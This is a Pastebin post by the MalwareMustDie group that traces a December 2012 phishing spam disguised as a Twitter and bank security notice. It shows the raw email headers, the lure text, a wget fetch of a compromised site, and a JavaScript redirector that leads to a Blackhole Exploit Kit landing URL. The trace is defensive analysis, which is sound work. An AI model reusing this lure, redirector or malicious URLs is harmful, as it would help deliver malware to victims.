Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =====================================
- #MalwareMustDie - A quest
- Spam to BHEK to ...
- =====================================
- // Folowing "Twitter-Security-looks" Spams:
- // hint & follow by Ken Pryor
- // Spam in orig format(txt)
- Delivered-To: xxxxx@xxxxx.com
- Received: by 10.216.95.198 with SMTP id p48csp285246wef;
- Wed, 26 Dec 2012 06:58:12 -0800 (PST)
- X-Received: by 10.182.36.8 with SMTP id m8mr22507914obj.93.1356533891842;
- Wed, 26 Dec 2012 06:58:11 -0800 (PST)
- Return-Path: <JuniorGastelum@schmitt-title.com>
- Received: from ????-?? ([92.46.240.84])
- by mx.google.com with ESMTP id y4si7207599obv.81.2012.12.26.06.58.08;
- Wed, 26 Dec 2012 06:58:11 -0800 (PST)
- Received-SPF: softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) client-ip=92.46.240.84;
- Authentication-Results: mx.google.com; spf=softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) smtp.mail=JuniorGastelum@schmitt-title.com
- Received: from ham-cannon.twitter.com ([199.59.148.236]) by schmitt-title.com;
- Wed, 26 Dec 2012 03:58:10 +0600
- Date: Wed, 26 Dec 2012 03:58:10 +0600
- From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
- Reply-To: noreply@postmaster.twitter.com
- To: xxxxx@xxxxx.com
- Message-Id: <1KC8PY8L49UMD_TPA1QU8PAABSYQ9C03@522357004.twitter.com.tmail>
- Subject: Re: Banking security update.
- Mime-Version: 1.0
- Content-Type: multipart/alternative; boundary=mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
- X-Campaignid: twitter51056991109478
- X-Twitterimpressionid: am-57174748899437484147607592
- Errors-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
- Bounces-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
- Return-Path: c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com
- X-OriginalArrivalTime: Wed, 26 Dec 2012 03:58:10 +0600 FILETIME=[726C4133:38072607]
- --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
- Content-Type: text/plain; charset=UTF-8
- Content-Transfer-Encoding: 7bit
- Dear Online Account Operator,
- Your ACH transactions have been
- temporarily disabled.
- View details
- Best regards,
- Security department
- --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
- Content-Type: text/html; charset=UTF-8
- Content-Transfer-Encoding: 7bit
- <html>
- <body >
- Dear Online Account Operator, <br><br>
- Your ACH transactions have been <br>
- temporarily disabled. <br>
- <a href="http://www.bibliotekarz.pl/sites/all/themes/mail2.htm">View details </a><br><br>
- Best regards,<br>
- Security department<br><br><br><br><br>
- </body>
- </html>
- --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51--
- // fetch the stuff..tips: use the email domain source as referer
- --2012-12-27 02:24:45-- http://www.bibliotekarz.pl/sites/all/themes/mail2.htm
- Resolving www.bibliotekarz.pl (www.bibliotekarz.pl)... 194.181.21.145
- Caching www.bibliotekarz.pl => 194.181.21.145
- Connecting to www.bibliotekarz.pl (www.bibliotekarz.pl)|194.181.21.145|:80... connected.
- Created socket 3.
- Releasing 0x28804160 (new refcount 1).
- ---request begin---
- GET /sites/all/themes/mail2.htm HTTP/1.1
- Referer: http://twitter.com
- User-Agent: MalwareMustDie is painting red X-mark on your door!
- Accept: */*
- Host: www.bibliotekarz.pl
- Connection: Keep-Alive
- ---request end---
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Wed, 26 Dec 2012 16:16:06 GMT
- Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 PHP/5.2.14
- Last-Modified: Wed, 26 Dec 2012 16:07:02 GMT
- ETag: "250ef8-1a7-4d1c39eecf580"
- Accept-Ranges: bytes
- Content-Length: 423
- Cache-Control: max-age=1209600
- Expires: Wed, 09 Jan 2013 16:16:06 GMT
- Keep-Alive: timeout=5, max=100
- Connection: Keep-Alive
- Content-Type: text/html
- ---response end---
- 200 OK
- Saving to: `mail2.htm'
- 2012-12-27 02:24:47 (8.08 MB/s) - `mail2.htm' saved [423/423]
- // See the inside....
- @unixfreaxjp /malware]$ cat mail2.htm
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>Please wait</title>
- </head>
- <body>
- <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
- <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
- <script>
- var1=49;
- var2=var1;
- if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
- </script>
- </body>
- // LANDING PAGE:
- http://bunakaranka.ru:8080/forum/links/column.php
- // Blackhole PoC:
- Resolving bunakaranka.ru (bunakaranka.ru)... 210.71.250.131, 187.85.160.106, 91.224.135.20
- Caching bunakaranka.ru => 210.71.250.131 187.85.160.106 91.224.135.20
- Connecting to bunakaranka.ru (bunakaranka.ru)|210.71.250.131|:8080... connected.
- // THis pattern/signatures;:
- Server: nginx/1.0.10
- Date: Wed, 26 Dec 2012 17:30:46 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- // You know the drill from here, just follow guidance posts in malwaremustdie.blogspot.com !
- ---
- MalwareMustDie - Dec 26th 2012
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement